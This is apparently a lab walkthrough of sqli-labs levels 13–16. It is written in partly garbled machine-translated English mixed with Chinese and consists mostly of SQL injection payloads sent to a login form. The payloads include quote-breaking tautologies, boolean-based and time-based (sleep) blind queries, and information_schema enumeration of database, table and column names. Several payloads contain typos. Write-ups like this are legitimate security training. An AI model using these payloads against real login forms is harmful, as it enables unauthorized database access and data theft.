less13-16

less13

First and 12 off the same user name and password will echo off 12 off 13 did not return significant content

 

 

uname = admin & passwd = admin & submit = Submit this case just shows successful landing, but will not display additional information.

 

 

The user name into other login fails uname = adm & passwd = admin & submit = Submit
 

  uname = adm 'or 1 = 1 # & passwd = admin & submit = Submit error will prompt statement

  Direct know how to construct the information given by the structure: 1 ') or 1 = 1 #

 

 

 

 

Suppose there are two columns uname = adm ') or union select 1,2, # & passwd = admin & submit = Submit error

 

Guess database:

No echo information to consider using blinds

uname=adm ') or if(length(database())>7,1,sleep(5)) # & passwd=admin & submit=Submit
 

if (length (database ())> 8,1, sleep (5))> 8 displays are connected to the database name is not returned immediately guessed length 8  

 

The first uname = adm ') or left (database (), 1)>' a '# determination database

 

 

 

 

 

 

或者使用uname=ain') or left((select schema_name from information_schema.schemata limit 0,1),1)>'a' #&passwd=admin&submit=Submit 

 

 

 

Manually enter the more difficult we use brute force

uname=ain') or left((select schema_name from information_schema.schemata limit 0,1),1)='a' #&passwd=admin&submit=Submit 

猜出第一个字母是i

 

 

 

flag.jpg则显示登录成功

接下来判断第2位

 

 

 

 

 

 

 

 

 

以此类推 猜出345。。位数据库名字

 

 

 

 

 

less14

uname=admin &passwd=admin&submit=Submit 

 

 

uname=admin '# &passwd=admin&submit=Submit 

 

 

uname=admin " # &passwd=admin&submit=Submit 

 

 

 

 

 

 uname=admi" or length(database())='8'#&passwd=admin&submit=Submit

 

 

 

 

 

 

 

 

 

 

 

 

13关 是’） 

14关是 ” 

15关是 ' 

16关是 ”）

查询语句

 

 uname=admi" or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)='a'#&passwd=admin&submit=Submit

 uname=ain" or left((select schema_name from information_schema.schemata limit 0,1),1)='u' #&passwd=admin&submit=Submit
uname=adin " or left((select table_name from information_schema.tables where table_schema='security' limit 0,1),1)>'a'#&passwd=admin&submit=Submit  
uname=adin " or left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='a'#&passwd=admin&submit=Submit 

判断长度

 uname = adminadmin&passwd=admiand") or if(length(database())>1,1,sleep(5))#&submit=Submit通过这个来判断其长度
 uname=adminadmin&passwd=admiand”) or if(length()>1000,1,sleep(5))#&submit=Submit